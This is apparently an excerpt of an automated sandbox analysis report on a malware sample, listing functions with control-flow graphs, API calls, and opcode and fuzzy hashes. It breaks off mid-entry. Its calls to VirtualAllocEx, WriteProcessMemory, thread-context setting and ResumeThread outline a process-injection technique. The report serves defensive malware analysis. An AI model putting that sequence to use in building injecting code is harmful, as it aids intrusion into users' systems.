                                                                                          Function 0754BCF0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 911 754bcf0-754bd85 913 754bd87-754bd91 911->913 914 754bdbe-754bdde 911->914 913->914 915 754bd93-754bd95 913->915 919 754be17-754be46 914->919 920 754bde0-754bdea 914->920 917 754bd97-754bda1 915->917 918 754bdb8-754bdbb 915->918 921 754bda5-754bdb4 917->921 922 754bda3 917->922 918->914 930 754be7f-754bf39 CreateProcessA 919->930 931 754be48-754be52 919->931 920->919 923 754bdec-754bdee 920->923 921->921 924 754bdb6 921->924 922->921 925 754bdf0-754bdfa 923->925 926 754be11-754be14 923->926 924->918 928 754bdfc 925->928 929 754bdfe-754be0d 925->929 926->919 928->929 929->929 932 754be0f 929->932 942 754bf42-754bfc8 930->942 943 754bf3b-754bf41 930->943 931->930 933 754be54-754be56 931->933 932->926 935 754be58-754be62 933->935 936 754be79-754be7c 933->936 937 754be64 935->937 938 754be66-754be75 935->938 936->930 937->938 938->938 939 754be77 938->939 939->936 953 754bfd8-754bfdc 942->953 954 754bfca-754bfce 942->954 943->942 955 754bfec-754bff0 953->955 956 754bfde-754bfe2 953->956 954->953 957 754bfd0 954->957 959 754c000-754c004 955->959 960 754bff2-754bff6 955->960 956->955 958 754bfe4 956->958 957->953 958->955 962 754c016-754c01d 959->962 963 754c006-754c00c 959->963 960->959 961 754bff8 960->961 961->959 964 754c034 962->964 965 754c01f-754c02e 962->965 963->962 966 754c035 964->966 965->964 966->966
                                                                                          APIs
                                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0754BF26
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1835554137.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7540000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateProcess
                                                                                          • String ID:
                                                                                          • API String ID: 963392458-0
                                                                                          • Opcode ID: a6f678effa56d46382bd6c1790a5720afa6b32ff3c8cfc8b431143c6b5847b02
                                                                                          • Instruction ID: 82e0fa39234d334a252d4fcaf006c0b4c1b14023fe271f1e872f557b56a1a593
                                                                                          • Opcode Fuzzy Hash: a6f678effa56d46382bd6c1790a5720afa6b32ff3c8cfc8b431143c6b5847b02
                                                                                          • Instruction Fuzzy Hash: 60913BF1D0021ADFDF24DF69C8417DDBAB2BF48318F1485AAE808A7290DB759985CF91
                                                                                          Function 00C1AD88 Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 968 c1ad88-c1ad97 969 c1adc3-c1adc7 968->969 970 c1ad99-c1ada6 call c1a0e0 968->970 971 c1adc9-c1add3 969->971 972 c1addb-c1ae1c 969->972 977 c1ada8 970->977 978 c1adbc 970->978 971->972 979 c1ae29-c1ae37 972->979 980 c1ae1e-c1ae26 972->980 1023 c1adae call c1b010 977->1023 1024 c1adae call c1b020 977->1024 978->969 982 c1ae39-c1ae3e 979->982 983 c1ae5b-c1ae5d 979->983 980->979 981 c1adb4-c1adb6 981->978 984 c1aef8-c1afb8 981->984 986 c1ae40-c1ae47 call c1a0ec 982->986 987 c1ae49 982->987 985 c1ae60-c1ae67 983->985 1018 c1afc0-c1afeb GetModuleHandleW 984->1018 1019 c1afba-c1afbd 984->1019 989 c1ae74-c1ae7b 985->989 990 c1ae69-c1ae71 985->990 988 c1ae4b-c1ae59 986->988 987->988 988->985 993 c1ae88-c1ae91 call c1a0fc 989->993 994 c1ae7d-c1ae85 989->994 990->989 999 c1ae93-c1ae9b 993->999 1000 c1ae9e-c1aea3 993->1000 994->993 999->1000 1001 c1aec1-c1aece 1000->1001 1002 c1aea5-c1aeac 1000->1002 1009 c1aef1-c1aef7 1001->1009 1010 c1aed0-c1aeee 1001->1010 1002->1001 1004 c1aeae-c1aebe call c1a10c call c1a11c 1002->1004 1004->1001 1010->1009 1020 c1aff4-c1b008 1018->1020 1021 c1afed-c1aff3 1018->1021 1019->1018 1021->1020 1023->981 1024->981
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 00C1AFDE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1828065397.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_c10000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule
                                                                                          • String ID:
                                                                                          • API String ID: 4139908857-0
                                                                                          • Opcode ID: 9b8d381857ebcadcef750935490dfcce8ca2dce17fa8574ba191ff5c67d8021e
                                                                                          • Instruction ID: 80784b59d094171ba4d41891ac34e6bc814badb3421c31a5283e4843f98958c1
                                                                                          • Opcode Fuzzy Hash: 9b8d381857ebcadcef750935490dfcce8ca2dce17fa8574ba191ff5c67d8021e
                                                                                          • Instruction Fuzzy Hash: 6F7167B0A01B059FDB24DF29D44179ABBF1FF89300F10892DE49AD7A50DB34E985DB91
                                                                                          Function 00C1590C Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1025 c1590c-c159d9 CreateActCtxA 1027 c159e2-c15a3c 1025->1027 1028 c159db-c159e1 1025->1028 1035 c15a4b-c15a4f 1027->1035 1036 c15a3e-c15a41 1027->1036 1028->1027 1037 c15a51-c15a5d 1035->1037 1038 c15a60 1035->1038 1036->1035 1037->1038 1040 c15a61 1038->1040 1040->1040
                                                                                          APIs
                                                                                          • CreateActCtxA.KERNEL32(?), ref: 00C159C9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1828065397.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_c10000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID: Create
                                                                                          • String ID:
                                                                                          • API String ID: 2289755597-0
                                                                                          • Opcode ID: 1df571a7bc4e778db033b1bbd5a2c3e03ab377ccad0ae320c59c51690bcb76dd
                                                                                          • Instruction ID: a8f6c9d6169297b68e32a796c5fc2dd3002b0d1163e6d756db9718061f44fe30
                                                                                          • Opcode Fuzzy Hash: 1df571a7bc4e778db033b1bbd5a2c3e03ab377ccad0ae320c59c51690bcb76dd
                                                                                          • Instruction Fuzzy Hash: 504100B1C0061DCEDB24CFA9C884BDEBBB5FF89304F20816AD408AB255DB756986CF50
                                                                                          Function 00C144B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1041 c144b4-c159d9 CreateActCtxA 1044 c159e2-c15a3c 1041->1044 1045 c159db-c159e1 1041->1045 1052 c15a4b-c15a4f 1044->1052 1053 c15a3e-c15a41 1044->1053 1045->1044 1054 c15a51-c15a5d 1052->1054 1055 c15a60 1052->1055 1053->1052 1054->1055 1057 c15a61 1055->1057 1057->1057
                                                                                          APIs
                                                                                          • CreateActCtxA.KERNEL32(?), ref: 00C159C9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1828065397.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_c10000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID: Create
                                                                                          • String ID:
                                                                                          • API String ID: 2289755597-0
                                                                                          • Opcode ID: d353d09806d8602df94c75683909cb29aa2dd6fdf34900b8994050138210bfd2
                                                                                          • Instruction ID: dc9aaf2b43482792cbedeb681487a1ff9cbddfc16caf0c66e7106f66a90c293e
                                                                                          • Opcode Fuzzy Hash: d353d09806d8602df94c75683909cb29aa2dd6fdf34900b8994050138210bfd2
                                                                                          • Instruction Fuzzy Hash: CC41E2B0C0061DCADB24CFA9C984BDEBBB5FF89304F20805AD408AB255DB756986DF90
                                                                                          Function 0754BA60 Relevance: 1.6, APIs: 1, Instructions: 74injectionCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1058 754ba60-754bab6 1061 754bac6-754bb05 WriteProcessMemory 1058->1061 1062 754bab8-754bac4 1058->1062 1064 754bb07-754bb0d 1061->1064 1065 754bb0e-754bb3e 1061->1065 1062->1061 1064->1065
                                                                                          APIs
                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0754BAF8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1835554137.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7540000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3559483778-0
                                                                                          • Opcode ID: c8e289de85f654623f11decf67a134417130c8ab8c4444cbc9f2629ffab92ccc
                                                                                          • Instruction ID: e58d90d726c4ebb63a9c18ecddbc73038db1fba6565923730f5916c915ec2f58
                                                                                          • Opcode Fuzzy Hash: c8e289de85f654623f11decf67a134417130c8ab8c4444cbc9f2629ffab92ccc
                                                                                          • Instruction Fuzzy Hash: DF215CB69003499FDB10CFAAC985BDEBBF5FF48324F14842AE519A7241D7749940DBA0
                                                                                          Function 0754BB50 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0754BBD8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1835554137.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7540000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessRead
                                                                                          • String ID:
                                                                                          • API String ID: 1726664587-0
                                                                                          • Opcode ID: 3dd46eccdcdfb40e2fc2ad6f1e0ce47267c8bfa2badffb6316b6443a8af30e00
                                                                                          • Instruction ID: ac64670d8e0ac19f15fbda44c6f7f6b1876674508693a5f8af2392b4f7b86790
                                                                                          • Opcode Fuzzy Hash: 3dd46eccdcdfb40e2fc2ad6f1e0ce47267c8bfa2badffb6316b6443a8af30e00
                                                                                          • Instruction Fuzzy Hash: A22139B18003099FDB10DFAAC841ADEBBF5FF48324F10842AE518A7240C779A940DBA5
                                                                                          Function 0754BA68 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0754BAF8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1835554137.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7540000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3559483778-0
                                                                                          • Opcode ID: 04e69e5002582eaaa82fd2424cdfe10bb0dfdf116d737fa9b737fb611ec9f8ca
                                                                                          • Instruction ID: 8b5517fe730823fd6703ae0eb8be10f81a4d05b9fbf4c84cf89058c4b7b57d52
                                                                                          • Opcode Fuzzy Hash: 04e69e5002582eaaa82fd2424cdfe10bb0dfdf116d737fa9b737fb611ec9f8ca
                                                                                          • Instruction Fuzzy Hash: 0C213BB19003499FDB10CFAAC985BDEBBF5FF48314F14842AE519A7240D7789940DBA0
                                                                                          Function 0754B8C8 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0754B94E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1835554137.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7540000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID: ContextThreadWow64
                                                                                          • String ID:
                                                                                          • API String ID: 983334009-0
                                                                                          • Opcode ID: 672dacb1099b5f91237d6f4184930cd450de0b95f155e0b8aeacf4117fcaa78a
                                                                                          • Instruction ID: 7b09c5965b43f918215ef0e807ec177647c4787ff747a60da30d04e1af99cb3e
                                                                                          • Opcode Fuzzy Hash: 672dacb1099b5f91237d6f4184930cd450de0b95f155e0b8aeacf4117fcaa78a
                                                                                          • Instruction Fuzzy Hash: 472159B19003099FDB14DFAAC4817EEBBF4EF48324F10842AD459A7240CB78A945CBA1
                                                                                          Function 00C1D658 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C1D6E7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1828065397.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_c10000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID: DuplicateHandle
                                                                                          • String ID:
                                                                                          • API String ID: 3793708945-0
                                                                                          • Opcode ID: b088eaa2ce5b885c37daf4b47b880d6ae3df56cdb3f29bc62ac671523a5ffa49
                                                                                          • Instruction ID: 5fd1e208d2854c3604f31fd73c853efe178435de01bd0e29b03c53f65309195d
                                                                                          • Opcode Fuzzy Hash: b088eaa2ce5b885c37daf4b47b880d6ae3df56cdb3f29bc62ac671523a5ffa49
                                                                                          • Instruction Fuzzy Hash: 532148B5800249DFDB10CFAAD584ADEBFF4EF49320F24855AE969A7350C374A941DF60
                                                                                          Function 0754BB58 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0754BBD8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1835554137.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7540000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessRead
                                                                                          • String ID:
                                                                                          • API String ID: 1726664587-0
                                                                                          • Opcode ID: f34ea4a93faf0069510bb1f4a454afe0b87b17230466c2f80d2574c30e8fcd11
                                                                                          • Instruction ID: 8159d41812e29d8a84f0813711f12d1dc5e580a6318e894e3c62bf7e7ece700a
                                                                                          • Opcode Fuzzy Hash: f34ea4a93faf0069510bb1f4a454afe0b87b17230466c2f80d2574c30e8fcd11
                                                                                          • Instruction Fuzzy Hash: 842139B1D003499FDB10DFAAC981ADEFBF5FF48324F10842AE519A7250C779A900DBA5
                                                                                          Function 0754B8D0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0754B94E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1835554137.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7540000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID: ContextThreadWow64
                                                                                          • String ID:
                                                                                          • API String ID: 983334009-0
                                                                                          • Opcode ID: 05d9e0810528672ee4f2ae0b99fd1501c6b075893a3ac8eb752d1a3b6f1173c5
                                                                                          • Instruction ID: 04a7372f9f75ebfaf0469eed6c85174b0ae95c762b6bdafb7f62ef9d6f32d999
                                                                                          • Opcode Fuzzy Hash: 05d9e0810528672ee4f2ae0b99fd1501c6b075893a3ac8eb752d1a3b6f1173c5
                                                                                          • Instruction Fuzzy Hash: 092138B1D003099FDB10DFAAC8857EEBBF4EF48324F14842AD559A7240C7789944CFA1
                                                                                          Function 00C1D660 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C1D6E7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1828065397.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_c10000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID: DuplicateHandle
                                                                                          • String ID:
                                                                                          • API String ID: 3793708945-0
                                                                                          • Opcode ID: ad571b740bc64f9bcc50b638281c53d6e3f7869e491f3eb78e2f0d526adc235a
                                                                                          • Instruction ID: d12dfefcf141329130d6b61951775f269fed37709bbfc37e25d48007a82780e5
                                                                                          • Opcode Fuzzy Hash: ad571b740bc64f9bcc50b638281c53d6e3f7869e491f3eb78e2f0d526adc235a
                                                                                          • Instruction Fuzzy Hash: B821E4B59002099FDB10CF9AD984ADEBBF8EF48320F14841AE918A3310D374A940DFA5
                                                                                          Function 0754B9A0 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0754BA16
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1835554137.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7540000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          • Opcode ID: 7899519575df75e9011a20cc7e707067423773abd4474cacf3bf4d82e97bcdfa
                                                                                          • Instruction ID: f407d5554253346aa1db3d121fef5ad76776ca246a3660601a1f04b5f993006c
                                                                                          • Opcode Fuzzy Hash: 7899519575df75e9011a20cc7e707067423773abd4474cacf3bf4d82e97bcdfa
                                                                                          • Instruction Fuzzy Hash: 6A1189B68003499FDB10DFAAC845ADEBFF5EF48324F20881AE519A7250CB75A540CBA1
                                                                                          Function 0754B3E0 Relevance: 1.6, APIs: 1, Instructions: 56threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1835554137.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7540000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID: ResumeThread
                                                                                          • String ID:
                                                                                          • API String ID: 947044025-0
                                                                                          • Opcode ID: 69f72476d4f46ed4aaf208a283282865a6e5264b878006bd262536a614394366
                                                                                          • Instruction ID: 40586b5b7b606e5ad2dd9564f09b4facdabe890960025a8c36039827576bf9de
                                                                                          • Opcode Fuzzy Hash: 69f72476d4f46ed4aaf208a283282865a6e5264b878006bd262536a614394366
                                                                                          • Instruction Fuzzy Hash: 041158B1D002098FDB20DFAAD5457DEFBF5EF88328F24881AD519A7340CA79A540CBA5
                                                                                          Function 0754B9A8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0754BA16
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1835554137.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7540000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          • Opcode ID: 87cf3597a3af140ef6007b4e1b2d11b07aa99c4619ac4ac543abc08d7546e284
                                                                                          • Instruction ID: ec1c3190814bff43965274df04f30cf2da9f5c344e99785e70f12075e1dad899
                                                                                          • Opcode Fuzzy Hash: 87cf3597a3af140ef6007b4e1b2d11b07aa99c4619ac4ac543abc08d7546e284
                                                                                          • Instruction Fuzzy Hash: 70113AB29002499FDB10DFAAC845ADFBFF5EF48324F248419E519A7250C7759540DFA1
                                                                                          Function 0754B3E8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1835554137.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7540000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID: ResumeThread
                                                                                          • String ID:
                                                                                          • API String ID: 947044025-0
                                                                                          • Opcode ID: 572eb0900f9040e110e4c7cc0e1418046913949e3e09c49c2d3f038db9b91225
                                                                                          • Instruction ID: 1caff6d033bff4e27e55ca3449cf217aba5465ace8aaeb9cf5ee3d206732f91e
                                                                                          • Opcode Fuzzy Hash: 572eb0900f9040e110e4c7cc0e1418046913949e3e09c49c2d3f038db9b91225
                                                                                          • Instruction Fuzzy Hash: C71128B1D002498FDB20DFAAC4457DEFBF5EF88324F24841AD519A7240C679A540CB95
                                                                                          Function 00C1AF78 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 00C1AFDE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1828065397.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_c10000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule
                                                                                          • String ID:
                                                                                          • API String ID: 4139908857-0
                                                                                          • Opcode ID: aa23b9f8fc0378848d0895e9b136fdf3f6c9a9c8ef3e5628bad14f37aa3baeac
                                                                                          • Instruction ID: da257607c2b1f66ccec5243ab09bf56099c0d0b13827e18cfe78ab296afdc8cd
                                                                                          • Opcode Fuzzy Hash: aa23b9f8fc0378848d0895e9b136fdf3f6c9a9c8ef3e5628bad14f37aa3baeac
                                                                                          • Instruction Fuzzy Hash: 1611E0B6C002498FDB10CF9AC544ADEFBF4EF89324F24845AD429A7610D379A645CFA1
                                                                                          Function 0AD600D1 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PostMessageW.USER32(?,?,?,?), ref: 0AD60135
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1838316165.000000000AD60000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AD60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ad60000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessagePost
                                                                                          • String ID:
                                                                                          • API String ID: 410705778-0
                                                                                          • Opcode ID: 4f254e89535dd1d9ce6fe165bae4cdbaeb51a535681ac5aee4c6bf233e4f69b1
                                                                                          • Instruction ID: dd67af759b9f616358f3236f294d2eaab48254f720bffab0570f873177b5788e
                                                                                          • Opcode Fuzzy Hash: 4f254e89535dd1d9ce6fe165bae4cdbaeb51a535681ac5aee4c6bf233e4f69b1
                                                                                          • Instruction Fuzzy Hash: 131103B5800349DFDB10DF99D985BDEBBF8EB48324F20841AE518A7200D379A944CFA5
                                                                                          Function 0AD600D8 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PostMessageW.USER32(?,?,?,?), ref: 0AD60135
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1838316165.000000000AD60000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AD60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ad60000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessagePost
                                                                                          • String ID:
                                                                                          • API String ID: 410705778-0
                                                                                          • Opcode ID: 590884bf2f075b05cd638944c3c9c0e05a70a7c721364957d31d20e8cb4e1248
                                                                                          • Instruction ID: d97809a0ecbb9fa619febc74ead66dcbd7b8f00dddba28e8523a787e56593948
                                                                                          • Opcode Fuzzy Hash: 590884bf2f075b05cd638944c3c9c0e05a70a7c721364957d31d20e8cb4e1248
                                                                                          • Instruction Fuzzy Hash: D511D3B5800349DFDB10DF9AC985BDEBBF8EB48324F20841AE518A7610C379A544CFA5
                                                                                          Function 02D36C38 Relevance: 1.4, Strings: 1, Instructions: 192COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1830060014.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2d30000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: d8kq
                                                                                          • API String ID: 0-510916774
                                                                                          • Opcode ID: 13e9a5c7e985ebf9a0c2d498245225807ae1c520b41ea9ae4d95384ad6fe5781
                                                                                          • Instruction ID: 73613b7b1ae306e4852966529b308b22d66655581bcb37b79a6181e95840a2dc
                                                                                          • Opcode Fuzzy Hash: 13e9a5c7e985ebf9a0c2d498245225807ae1c520b41ea9ae4d95384ad6fe5781
                                                                                          • Instruction Fuzzy Hash: CA616034B00118AFCB16DF69D894AAE7BF6EF89711F144469E906A7394CB31DC41CB94
                                                                                          Function 02D3E11C Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1830060014.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2d30000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Tefq
                                                                                          • API String ID: 0-1066582953
                                                                                          • Opcode ID: ee5c749d6af54dd129b0a15702a12a014b2a85c840f85c8520a897e89e7966ee
                                                                                          • Instruction ID: b88684d830b6f0c4231660e56b8221a7bff40cce5afd7bd97c234a722eeec968
                                                                                          • Opcode Fuzzy Hash: ee5c749d6af54dd129b0a15702a12a014b2a85c840f85c8520a897e89e7966ee
                                                                                          • Instruction Fuzzy Hash: F051AE71B002494FCB05EB79D8949AEBBF6EFC5320714896AE459D7391EF309D0687A0
                                                                                          Function 02D3F218 Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1830060014.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2d30000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 8jq
                                                                                          • API String ID: 0-3286795621
                                                                                          • Opcode ID: 48fcc2e4556cf1a5f5cfc49f5c42dea4dd4c9ed8f92568a33bdc41270f01313a
                                                                                          • Instruction ID: 0cb6c67a1d3f67403ab25ea54274422a6b3cedf0f771cc022b88c6f772a2d3e1
                                                                                          • Opcode Fuzzy Hash: 48fcc2e4556cf1a5f5cfc49f5c42dea4dd4c9ed8f92568a33bdc41270f01313a
                                                                                          • Instruction Fuzzy Hash: 9241E678E15208DFCB05DFA9E8446EEBBB6FF89311F108029E815A7794CB705D45CBA0
                                                                                          Function 02D3F208 Relevance: 1.3, Strings: 1, Instructions: 98COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1830060014.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2d30000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 8jq
                                                                                          • API String ID: 0-3286795621
                                                                                          • Opcode ID: b8dd839ac2e0200e4008f7a158e6bfebd90b9b9007abe7d32a36536a7ff6276c
